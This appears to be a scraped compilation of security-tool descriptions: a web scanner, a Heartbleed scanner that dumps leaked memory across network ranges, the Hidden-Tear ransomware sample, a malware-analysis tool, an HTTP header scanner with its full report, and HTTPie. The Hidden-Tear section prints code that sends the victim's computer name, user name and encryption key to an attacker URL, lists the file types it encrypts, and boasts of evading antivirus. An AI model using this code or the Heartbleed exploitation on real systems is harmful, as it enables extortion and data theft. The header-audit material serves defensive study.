6. Kibana and Elastic search, for dashboarding
listening to JSON over port 5000
Preconfigured docker image available at https://hub.docker.com/r/yukinying/elk/
Installation
go get github.com/yahoo/gryffin/...

Run

TODO
1. Mobile browser user agent
2. Preconfigured docker images
3. Redis for sharing states across machines
4. Instruction to run gryffin (distributed or standalone)
5. Documentation for html-distance
6. Implement a JSON serializable cookiejar.
7. Identify duplicate url patterns based on simhash result.

Download Gryffin
HEARTBLEED VULNERABILITY SCANNER - NETWORK SCANNER FOR OPENSSL MEMORY LEAK (CVE-2014-0160)

Heartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written in Python.
For scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable systems to check afterwards.
Heartbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS.
git clone https://github.com/hybridus/heartbleedscanner.git

Sample usage

To scan your local 192.168.1.0/24 network for the heartbleed vulnerability (https/443) and save the leaks into a file:
python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r

To scan the same network against SMTP over SSL/TLS and randomize the IP addresses:
python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r

If you already have a target list which you created using nmap/zmap:
python heartbleedscan.py -i targetlist.txt

Dependencies

Before using Heartbleed Vulnerability Scanner, you should install the python-netaddr package.
CentOS or CentOS-like systems:
yum install python-netaddr

Ubuntu or Debian-like systems:
apt-get install python-netaddr

Download Heartbleed Vulnerability Scanner


HIDDEN-TEAR - AN OPEN SOURCE RANSOMWARE-LIKE FILE CRYPTER


It's a ransomware-like file crypter sample which can be modified for specific purposes.
Features

Uses the AES algorithm to encrypt files.
Sends the encryption key to a server.
Encrypted files can be decrypted with the decrypter program using the encryption key.
Creates a text file on the Desktop with a given message.
Small file size (12 KB)
Not detected by antivirus programs (15/08/2015): http://nodistribute.com/result/6a4jDwi83Fzt


Usage

You need to have a web server which supports scripting languages like PHP, Python etc. Change this line to your URL (better use an HTTPS connection to avoid eavesdropping):
string targetURL = "https://www.example.com/hidden-tear/write.php?info=";

The script should write the GET parameter to a text file.
The sending is done in the SendPassword() function:
string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var content = new System.Net.WebClient().DownloadString(fullUrl);

Target file extensions can be changed. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

Legal Warning

While this may be helpful for some, there are significant risks. hidden tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.

Download Hidden-tear
HOOK ANALYSER 3.2 - MALWARE ANALYSIS TOOL

Hook Analyser is a freeware application which allows an investigator/analyst to perform static & run-time / dynamic analysis of suspicious applications, and also to gather (analyse & correlate) threat intelligence related information (or data) from various open sources on the Internet.

Essentially it's a malware analysis tool that has evolved to add some cyber threat intelligence features & mapping.
Hook Analyser is perhaps the only free software in the market which combines malware analysis and cyber threat intelligence capabilities. The software has been used by major Fortune 500 organisations.

Features/Functionality

Spawn and Hook to Application: enables you to spawn an application, and hook into it
Hook to a specific running process: allows you to hook to a running (active) process
Static Malware Analysis: scans PE/Windows executables to identify potential malware traces
Application crash analysis: allows you to analyse memory content when an application crashes
Exe extractor: this module essentially extracts executables from running process/s

Release

In this release, significant improvements and capabilities have been added to the Threat Intelligence module.
Following are the key improvements and enhanced features:

The malware analysis module has been improved, and new signatures have been added
Cyber Threat Intelligence module:
IP Intelligence module (analyse multiple IP addresses instead of just 1!). Sample output
Keyword Intelligence module (analyse keywords, e.g. Internet Explorer 11, IP address, Hash etc). Sample output
Network file (PCAP) analysis: analyse a user-provided .PCAP file and perform analysis on external IP addresses. Example
Social Intelligence (pulls data from Twitter for user-defined keywords and performs network analysis). Example

Let's look at "HOW-TO-USE" of this release (Cyber Threat Intelligence). The tool can perform analysis via 2 methods: auto mode and manual mode.
In the auto mode, the tool will use the following files for analysis:
1. Channels.txt (Path: feeds->channels.txt): Specify the list of the twitter related channels or keywords for monitoring. In the Auto mode, the monitoring is performed for 2 minutes only; however, if you'd like to monitor indefinitely, please select the manual mode.
Example
2. intelligence-ipdb.txt (Path: feeds->intelligence-ipdb.txt): Specify the list of IP addresses you'd like to analyse. Yes, you can provide as many IPs as you'd like to.
Example
3. Keywords.txt (Path: feeds->Keywords.txt): Specify the list of keywords you'd like to analyse. Yes, you can provide as many keywords as you'd like to.
Example
4. rssurl.txt (Path: feeds->rssurl.txt): Specify the RSS feeds to fetch vulnerability-related information.
Example
5. url.txt (Path: feeds->url.txt): Specify the list of the URLs from where the tool will pull malicious IP address information.
Example

The Threat Intel module can be executed from the HookAnalyser3.2.exe file (option #6) or can be executed directly through the ThreatIntel.exe file. Refer to the following screenshots.

In manual mode, you'd need to provide the filename as an argument. Example below.

Important note - The software shall only be used for "NON-COMMERCIAL" purposes. For commercial usage, written permission from the Author must be obtained prior to use.

Download Hook Analyser 3.2


HSECSCAN - A SECURITY SCANNER FOR HTTP RESPONSE HEADERS

hsecscan
A security scanner for HTTP response headers.
Requirements

Python 2.x
Usage
$ ./hsecscan.py
usage: hsecscan.py [-h] [-P] [-p] [-u URL] [-R] [-U UserAgent]
                   [-d 'POST data'] [-x PROXY]

A security scanner for HTTP response headers.

optional arguments:
  -h, --help            show this help message and exit
  -P, --database        Print the entire response headers database.
  -p, --headers         Print only the enabled response headers from database.
  -u URL, --URL URL     The URL to be scanned.
  -R, --redirect        Print redirect headers.
  -U User-Agent, --useragent User-Agent
                        Set the User-Agent request header (default: hsecscan).
  -d 'POST data', --postdata 'POST data'
                        Set the POST data (between single quotes) otherwise will be a GET
                        (example: '{ "q":"query string", "foo":"bar" }').
  -x PROXY, --proxy PROXY
                        Set the proxy server (example: 192.168.1.1:8080).
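Both gethead.py (above) and hsecscan check a response's headers against a database of expected protections. As an added example that is neither tool's code, the function below does a minimal version of that check over a list of (name, value) pairs (a list rather than a dict, so repeated Set-Cookie headers survive): presence and max-age of Strict-Transport-Security, presence of Content-Security-Policy, the X-Frame-Options and X-Content-Type-Options values, version strings in Server, and the Secure/HttpOnly attributes of each cookie. The 180-day HSTS minimum and the severity labels are assumptions of this example. The weak response is a constructed sample modelled on the shape of the scan output in the Example below, and a hardened variant that passes every check is given beside it.

```python
# Response-header analysis of the kind gethead.py and hsecscan perform.
# Added example, not the code of either tool; both sample responses are constructed.
import re
from typing import List, Tuple

Header = Tuple[str, str]
SIX_MONTHS = 180 * 24 * 3600  # assumed minimum HSTS max-age for this example


def _get(headers: List[Header], name: str) -> List[str]:
    """All values of a header, case-insensitively (HTTP header names are case-insensitive)."""
    return [v for n, v in headers if n.lower() == name.lower()]


def analyze_headers(headers: List[Header]) -> List[dict]:
    """Return one finding per missing or weak security-relevant header, most severe first."""
    findings: List[dict] = []

    def add(header, severity, detail):
        findings.append({"header": header, "severity": severity, "detail": detail})

    hsts = _get(headers, "Strict-Transport-Security")
    if not hsts:
        add("Strict-Transport-Security", "high", "missing; browsers may be downgraded to plain HTTP")
    else:
        m = re.search(r"max-age=(\d+)", hsts[0])
        if not m or int(m.group(1)) < SIX_MONTHS:
            add("Strict-Transport-Security", "medium", "max-age shorter than 180 days")

    if not _get(headers, "Content-Security-Policy"):
        add("Content-Security-Policy", "medium", "missing; no restriction on script sources")

    xfo = _get(headers, "X-Frame-Options")
    if not xfo:
        add("X-Frame-Options", "medium", "missing; page can be framed (clickjacking)")
    elif xfo[0].strip().upper() not in ("DENY", "SAMEORIGIN"):
        add("X-Frame-Options", "low", "unrecognised value %r" % xfo[0])

    xcto = _get(headers, "X-Content-Type-Options")
    if not xcto or xcto[0].strip().lower() != "nosniff":
        add("X-Content-Type-Options", "low", "missing or not 'nosniff'; MIME sniffing possible")

    for server in _get(headers, "Server"):
        if re.search(r"\d", server):  # a digit almost always means a version string
            add("Server", "info", "reveals software version: %r" % server)

    for cookie in _get(headers, "Set-Cookie"):
        name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().split("=", 1)[0].lower() for a in cookie.split(";")[1:]}
        if "secure" not in attrs:
            add("Set-Cookie", "medium", "cookie %r lacks the Secure attribute" % name)
        if "httponly" not in attrs:
            add("Set-Cookie", "medium", "cookie %r lacks the HttpOnly attribute" % name)

    order = {"high": 0, "medium": 1, "low": 2, "info": 3}
    return sorted(findings, key=lambda f: order[f["severity"]])


# Constructed sample modelled on the response shape hsecscan prints: X-Frame-Options
# is set, but there is no HSTS, no CSP, no nosniff, and the cookies lack Secure.
WEAK_RESPONSE: List[Header] = [
    ("Date", "Sun, 08 Nov 2015 14:12:18 GMT"),
    ("Cache-Control", "private, max-age=0"),
    ("Content-Type", "text/html; charset=ISO-8859-1"),
    ("Server", "gws"),
    ("X-XSS-Protection", "1; mode=block"),
    ("X-Frame-Options", "SAMEORIGIN"),
    ("Set-Cookie", "PREF=ID=1111111111111111; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.example.com"),
    ("Set-Cookie", "NID=73=abc; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.example.com; HttpOnly"),
]

# The same response after hardening: every check above passes.
HARDENED_RESPONSE: List[Header] = [
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Server", "gws"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Content-Security-Policy", "default-src 'self'"),
    ("X-Frame-Options", "DENY"),
    ("X-Content-Type-Options", "nosniff"),
    ("Set-Cookie", "SID=abc; Path=/; Secure; HttpOnly; SameSite=Lax"),
]
```

Presence checks are the easy half; the value checks matter more in practice, since a Content-Security-Policy of `default-src *` or an HSTS max-age of a few seconds both pass a presence-only scanner while protecting nothing.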

Example
$ ./hsecscan.py -u https://google.com
>> RESPONSE INFO <<
URL: https://www.google.com.br/?gfe_rd=cr&ei=Qlg_VuWHqWX8QeHraH4DQ
Code: 200
Headers:
Date: Sun, 08 Nov 2015 14:12:18 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.br
Set-Cookie: NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgztoFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.google.com.br; HttpOnly
Alternate-Protocol: 443:quic,p=1
Alt-Svc: quic="www.google.com:443"; p="1"; ma=600,quic=":443"; p="1"; ma=600
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
>> RESPONSE HEADERS DETAILS <<

Header Field Name: X-XSS-Protection
Value: 1; mode=block
Reference: http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx
Security Description: This header enables the Cross-site scripting (XSS) filter built into most recent web browsers. It's usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. This header is supported in IE 8+, and in Chrome (not sure which versions). The anti-XSS filter was added in Chrome 4. Its unknown if that version honored this header.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Use "X-XSS-Protection: 1; mode=block" whenever is possible (ref. http://blogs.msdn.com/b/ieinternals/archive/2011/01/31/controlling-the-internet-explorer-xss-filter-with-the-x-xss-protection-http-header.aspx).
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html
Header Field Name: Set-Cookie
Value: PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.br, NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgztoFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.google.com.br; HttpOnly
Reference: https://tools.ietf.org/html/rfc6265
Security Description: Cookies have a number of security pitfalls. In particular, cookies encourage developers to rely on ambient authority for authentication, often becoming vulnerable to attacks such as cross-site request forgery. Also, when storing session identifiers in cookies, developers often create session fixation vulnerabilities. Transport-layer encryption, such as that employed in HTTPS, is insufficient to prevent a network attacker from obtaining or altering a victim's cookies because the cookie protocol itself has various vulnerabilities. In addition, by default, cookies do not provide confidentiality or integrity from network attackers, even when used in conjunction with HTTPS.
Security Reference: https://tools.ietf.org/html/rfc6265#section-8
Recommendations: Please at least read these references: https://tools.ietf.org/html/rfc6265#section-8 and https://www.owasp.org/index.php/Session_Management_Cheat_Sheet#Cookies.
CWE: CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
CWE URL: https://cwe.mitre.org/data/definitions/614.html
Header Field Name: Accept-Ranges
Value: none
Reference: https://tools.ietf.org/html/rfc7233#section-2.3
Security Description: Unconstrained multiple range requests are susceptible to denial-of-service attacks because the effort required to request many overlapping ranges of the same data is tiny compared to the time, memory, and bandwidth consumed by attempting to serve the requested data in many parts.
Security Reference: https://tools.ietf.org/html/rfc7233#section-6
Recommendations: Servers ought to ignore, coalesce, or reject egregious range requests, such as requests for more than two overlapping ranges or for many small ranges in a single set, particularly when the ranges are requested out of order for no apparent reason.
CWE: CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion')
CWE URL: https://cwe.mitre.org/data/definitions/400.html
Header Field Name: Expires
Value: -1
Reference: https://tools.ietf.org/html/rfc7234#section-5.3
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Vary
Value: Accept-Encoding
Reference: https://tools.ietf.org/html/rfc7231#section-7.1.4
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Server
Value: gws
Reference: https://tools.ietf.org/html/rfc7231#section-7.4.2
Security Description: Overly long and detailed Server field values increase response latency and potentially reveal internal implementation details that might make it (slightly) easier for attackers to find and exploit known security holes.
Security Reference: https://tools.ietf.org/html/rfc7231#section-7.4.2
Recommendations: An origin server SHOULD NOT generate a Server field containing needlessly fine-grained detail and SHOULD limit the addition of subproducts by third parties.
CWE: CWE-200: Information Exposure
CWE URL: https://cwe.mitre.org/data/definitions/200.html
Header Field Name: Connection
Value: close
Reference: https://tools.ietf.org/html/rfc7230#section-6.1
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Cache-Control
Value: private, max-age=0
Reference: https://tools.ietf.org/html/rfc7234#section-5.2
Security Description: Caches expose additional potential vulnerabilities, since the contents of the cache represent an attractive target for malicious exploitation. Because cache contents persist after an HTTP request is complete, an attack on the cache can reveal information long after a user believes that the information has been removed from the network. Therefore, cache contents need to be protected as sensitive information.
Security Reference: https://tools.ietf.org/html/rfc7234#section-8
Recommendations: Do not store unnecessarily sensitive information in the cache.
CWE: CWE-524: Information Exposure Through Caching
CWE URL: https://cwe.mitre.org/data/definitions/524.html
Header Field Name: Date
Value: Sun, 08 Nov 2015 14:12:18 GMT
Reference: https://tools.ietf.org/html/rfc7231#section-7.1.1.2
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: P3P
Value: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Reference: http://www.w3.org/TR/P3P11/#syntax_ext
Security Description: While P3P itself does not include security mechanisms, it is intended to be used in conjunction with security tools. Users' personal information should always be protected with reasonable security safeguards in keeping with the sensitivity of the information.
Security Reference: http://www.w3.org/TR/P3P11/#principles_security
Recommendations:
CWE:
CWE URL:
Header Field Name: Content-Type
Value: text/html; charset=ISO-8859-1
Reference: https://tools.ietf.org/html/rfc7231#section-3.1.1.5
Security Description: In practice, resource owners do not
always properly configure their origin server to provide
the correct Content-Type for a given representation, with

the result that some clients will examine a payload's


content and override the specified type. Clients that do
so risk drawing incorrect conclusions, which might expose
additional security risks (e.g., "privilege escalation").
Security Reference: https://tools.ietf.org/html/
rfc7231#section-3.1.1.5
Recommendations: Properly configure their origin server
to provide the correct Content-Type for a given
representation.
CWE: CWE-430: Deployment of Wrong Handler
CWE URL: https://cwe.mitre.org/data/definitions/430.html
Header Field Name: X-Frame-Options
Value: SAMEORIGIN
Reference: https://tools.ietf.org/html/rfc7034
Security Description: The use of "X-Frame-Options" allows
a web page from host B to declare that its content (for
example, a button, links, text, etc.) must not be
displayed in a frame (<frame> or <iframe>) of another
page (e.g., from host A). This is done by a policy
declared in the HTTP header and enforced by browser
implementations.
Security Reference: https://tools.ietf.org/html/rfc7034
Recommendations:

In 2009 and 2010, many browser vendors

([Microsoft-X-Frame-Options] and [Mozilla-X-FrameOptions]) introduced the use of a non-standard HTTP


[RFC2616] header field "X-Frame-Options" to protect
against clickjacking. Please check here https://
www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
what's the best option for your case.

CWE: CWE-693: Protection Mechanism Failure


CWE URL: https://cwe.mitre.org/data/definitions/693.html
>> RESPONSE MISSING HEADERS <<
Header Field Name: Pragma
Reference: https://tools.ietf.org/html/
rfc7234#section-5.4
Security Description: Caches expose additional potential
vulnerabilities, since the contents of the cache
represent an attractive target for malicious
exploitation.
Security Reference: https://tools.ietf.org/html/
rfc7234#section-8
Recommendations: The "Pragma" header field allows
backwards compatibility with HTTP/1.0 caches, so that
clients can specify a "no-cache" request that they will
understand (as Cache-Control was not defined until HTTP/
1.1). When the Cache-Control header field is also present
and understood in a request, Pragma is ignored. Define
"Pragma: no-cache" whenever is possible.
CWE: CWE-524: Information Exposure Through Caching
CWE URL: https://cwe.mitre.org/data/definitions/524.html
Header Field Name: Public-Key-Pins
Reference: https://tools.ietf.org/html/rfc7469
Security Description: HTTP Public Key Pinning (HPKP) is a
trust on first use security mechanism which protects
HTTPS websites from impersonation using fraudulent
certificates issued by compromised certificate
authorities. The security context or pinset data is

supplied by the site or origin.


Security Reference: https://tools.ietf.org/html/rfc7469
Recommendations: Deploying Public Key Pinning (PKP)
safely will require operational and organizational
maturity due to the risk that hosts may make themselves
unavailable by pinning to a set of SPKIs that becomes
invalid. With care, host operators can greatly reduce the
risk of man-in-the-middle (MITM) attacks and other falseauthentication problems for their users without incurring
undue risk. PKP is meant to be used together with HTTP
Strict Transport Security (HSTS) [RFC6797], but it is
possible to pin keys without requiring HSTS.
CWE: CWE-295: Improper Certificate Validation
CWE URL: https://cwe.mitre.org/data/definitions/295.html
Header Field Name: Public-Key-Pins-Report-Only
Reference: https://tools.ietf.org/html/rfc7469
Security Description: HTTP Public Key Pinning (HPKP) is a
trust on first use security mechanism which protects
HTTPS websites from impersonation using fraudulent
certificates issued by compromised certificate
authorities. The security context or pinset data is
supplied by the site or origin.
Security Reference: https://tools.ietf.org/html/rfc7469
Recommendations: Deploying Public Key Pinning (PKP)
safely will require operational and organizational
maturity due to the risk that hosts may make themselves
unavailable by pinning to a set of SPKIs that becomes
invalid. With care, host operators can greatly reduce the
risk of man-in-the-middle (MITM) attacks and other false-

authentication problems for their users without incurring


undue risk. PKP is meant to be used together with HTTP
Strict Transport Security (HSTS) [RFC6797], but it is
possible to pin keys without requiring HSTS.
CWE: CWE-295: Improper Certificate Validation
CWE URL: https://cwe.mitre.org/data/definitions/295.html
Header Field Name: Strict-Transport-Security
Reference: https://tools.ietf.org/html/rfc6797
Security Description: HTTP Strict Transport Security
(HSTS) is a web security policy mechanism which helps to
protect secure HTTPS websites against downgrade attacks
and cookie hijacking. It allows web servers to declare
that web browsers (or other complying user agents) should
only interact with it using secure HTTPS connections, and
never via the insecure HTTP protocol. HSTS is an IETF
standards track protocol and is specified in RFC 6797.
Security Reference: https://tools.ietf.org/html/rfc6797
Recommendations: Please at least read this reference:
https://www.owasp.org/index.php/
HTTP_Strict_Transport_Security.
CWE: CWE-311: Missing Encryption of Sensitive Data
CWE URL: https://cwe.mitre.org/data/definitions/311.html
Header Field Name: Frame-Options
Reference: https://tools.ietf.org/html/rfc7034
Security Description: The use of "X-Frame-Options" allows
a web page from host B to declare that its content (for
example, a button, links, text, etc.) must not be
displayed in a frame (<frame> or <iframe>) of another

page (e.g., from host A). This is done by a policy


declared in the HTTP header and enforced by browser
implementations.
Security Reference: https://tools.ietf.org/html/rfc7034
Recommendations:

In 2009 and 2010, many browser vendors

([Microsoft-X-Frame-Options] and [Mozilla-X-FrameOptions]) introduced the use of a non-standard HTTP


[RFC2616] header field "X-Frame-Options" to protect
against clickjacking. Please check here https://
www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
what's the best option for your case.
CWE: CWE-693: Protection Mechanism Failure
CWE URL: https://cwe.mitre.org/data/definitions/693.html
Header Field Name: X-Content-Type-Options
Reference: http://blogs.msdn.com/b/ie/archive/2008/09/02/
ie8-security-part-vi-beta-2-update.aspx
Security Description: The only defined value, "nosniff",
prevents Internet Explorer and Google Chrome from MIMEsniffing a response away from the declared content-type.
This also applies to Google Chrome, when downloading
extensions. This reduces exposure to drive-by download
attacks and sites serving user uploaded content that, by
clever naming, could be treated by MSIE as executable or
dynamic HTML files.
Security Reference: https://www.owasp.org/index.php/
List_of_useful_HTTP_headers
Recommendations: Always use the only defined value,
"nosniff".
CWE: CWE-79: Improper Neutralization of Input During Web

Page Generation ('Cross-site Scripting')


CWE URL: https://cwe.mitre.org/data/definitions/79.html
Header Field Name: Content-Security-Policy
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires
careful tuning and precise definition of the policy. If
enabled, CSP has significant impact on the way browser
renders pages (e.g., inline JavaScript disabled by
default and must be explicitly allowed in policy). CSP
prevents a wide range of attacks, including Cross-site
scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/
List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/
CSP/ and set according to your case. This is not a easy
job.
CWE: CWE-79: Improper Neutralization of Input During Web
Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html
Header Field Name: X-Content-Security-Policy
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires
careful tuning and precise definition of the policy. If
enabled, CSP has significant impact on the way browser
renders pages (e.g., inline JavaScript disabled by
default and must be explicitly allowed in policy). CSP
prevents a wide range of attacks, including Cross-site
scripting and other cross-site injections.

Security Reference: https://www.owasp.org/index.php/


List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/
CSP/ and set according to your case. This is not a easy
job.
CWE: CWE-79: Improper Neutralization of Input During Web
Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html
Header Field Name: X-WebKit-CSP
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires
careful tuning and precise definition of the policy. If
enabled, CSP has significant impact on the way browser
renders pages (e.g., inline JavaScript disabled by
default and must be explicitly allowed in policy). CSP
prevents a wide range of attacks, including Cross-site
scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/
List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/
CSP/ and set according to your case. This is not a easy
job.
CWE: CWE-79: Improper Neutralization of Input During Web
Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html
Header Field Name: Content-Security-Policy-Report-Only
Reference: http://www.w3.org/TR/CSP/
Security Description: Like Content-Security-Policy, but

only reports. Useful during implementation, tuning and


testing efforts.
Security Reference: https://www.owasp.org/index.php/
List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/
CSP/ and set according to your case. This is not a easy
job.
CWE: CWE-79: Improper Neutralization of Input During Web
Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html
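The report above is essentially a checklist: which protective headers are absent, and which present headers carry a weak value. The Python below is an added example, not hsecscan's own code: it parses a raw HTTP response, flags the headers the report lists as missing, checks Server, X-Content-Type-Options and Set-Cookie for the weaknesses the report describes, and labels each finding with the CWE the report cites. Both responses are constructed for the example (the product names and cookie values are made up), and the Server heuristic is an assumption of this example rather than anything hsecscan does.

```python
"""Security-header audit in the spirit of the hsecscan report above.

Added example, not hsecscan's own code. It parses a raw HTTP response, flags
the headers hsecscan lists under ">> RESPONSE MISSING HEADERS <<", checks a
few present headers for the weaknesses the report describes, and maps each
finding to the CWE the report cites."""

# Constructed sample responses (not real captures). The first is modelled on
# the weak response in the report; the second is the hardened counterpart.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 08 Nov 2015 14:12:18 GMT\r\n"
    "Server: ExampleHTTPd/2.4.7 (Unix) mod_example/1.0\r\n"
    "Content-Type: text/html; charset=ISO-8859-1\r\n"
    "Cache-Control: private, max-age=0\r\n"
    "Set-Cookie: SID=abc123; Path=/\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html></html>"
)

HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: ExampleHTTPd\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-Frame-Options: DENY\r\n"
    "Content-Security-Policy: default-src 'self'\r\n"
    "Public-Key-Pins: pin-sha256=\"PLACEHOLDER_PIN\"; max-age=5184000\r\n"
    "Pragma: no-cache\r\n"
    "Set-Cookie: SID=abc123; Path=/; Secure; HttpOnly\r\n"
    "\r\n"
)

# Headers the report flags as missing, with the CWE it assigns to each.
# HPKP has since been dropped by browsers; it is kept only to mirror the report.
EXPECTED_HEADERS = {
    "strict-transport-security": "CWE-311",
    "x-content-type-options": "CWE-79",
    "content-security-policy": "CWE-79",
    "x-frame-options": "CWE-693",
    "public-key-pins": "CWE-295",
    "pragma": "CWE-524",
}


def parse_response(raw):
    """Split a raw response into (status line, {lower-case name: [values]}).
    Values are kept in a list because Set-Cookie may legitimately repeat."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        # Split at the first colon only; values such as Date contain colons.
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def audit(raw):
    """Return {"status": ..., "findings": [(header, problem, cwe), ...]}."""
    status, headers = parse_response(raw)
    findings = []

    for name, cwe in EXPECTED_HEADERS.items():
        if name not in headers:
            findings.append((name, "missing", cwe))

    # Server: product/version detail is the CWE-200 point in the report
    # (a slash or parenthesis is this example's heuristic for such detail).
    for value in headers.get("server", []):
        if "/" in value or "(" in value:
            findings.append(("server", "reveals product versions: " + value, "CWE-200"))

    # X-Content-Type-Options: "nosniff" is the only defined value.
    for value in headers.get("x-content-type-options", []):
        if value.lower() != "nosniff":
            findings.append(("x-content-type-options", "value is not nosniff", "CWE-79"))

    # Set-Cookie without the Secure attribute is CWE-614, the report's first finding.
    for value in headers.get("set-cookie", []):
        attrs = {a.strip().lower() for a in value.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(("set-cookie", "no Secure attribute", "CWE-614"))

    return {"status": status, "findings": findings}


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        result = audit(raw)
        print(label, result["status"], len(result["findings"]), "finding(s)")
        for header, problem, cwe in result["findings"]:
            print("  %-26s %-45s %s" % (header, problem, cwe))
```

The weak response yields five missing headers plus the Server and Set-Cookie findings; the hardened one yields none. Feeding it a live response means capturing the raw bytes with a client (HTTPie's `--print=h` or `curl -i` both work) and passing the text to `audit`.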

Download Hsecscan
HTTPIE - A CLI, CURL-LIKE TOOL FOR HUMANS

HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.
Main Features

Expressive and intuitive syntax
Formatted and colorized terminal output
Built-in JSON support
Forms and file uploads
HTTPS, proxies, and authentication
Arbitrary request data
Custom headers
Persistent sessions
Wget-like downloads
Python 2.6, 2.7 and 3.x support
Linux, Mac OS X and Windows support
Plugins
Documentation
Test coverage

Installation

On Mac OS X, HTTPie can be installed via Homebrew:
$ brew install httpie

Most Linux distributions provide a package that can be installed using the system package manager, e.g.:
# Debian-based distributions such as Ubuntu:
$ apt-get install httpie
# RPM-based distributions:
$ yum install httpie

A universal installation method (that works on Windows, Mac OS X and Linux, and provides the latest version) is to use pip:
# Make sure we have an up-to-date version of pip and setuptools:
$ pip install --upgrade pip setuptools
$ pip install --upgrade httpie

(If pip installation fails for some reason, you can try
easy_install httpie as a fallback.)
Development version
The latest development version can be installed directly from
GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD
# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/
tarball/master

Usage

Hello World:
$ http httpie.org

Synopsis:
